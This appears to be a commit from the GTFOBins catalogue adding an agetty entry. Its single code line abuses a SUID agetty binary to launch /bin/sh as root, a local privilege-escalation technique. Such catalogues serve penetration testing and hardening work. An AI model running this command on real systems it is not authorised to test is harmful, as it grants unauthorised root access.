Add agetty

with sudo not allowed
This commit is contained in:
d4t4s3c 2022-01-17 14:47:18 +01:00 committed by Andrea Cardaci
parent 2c1efe6afd
commit ecdacfc3ac

5
agetty.md Normal file
View File

@ -0,0 +1,5 @@
---
functions:
suid:
- code: ./agetty -o -p -l /bin/sh -a root tty
---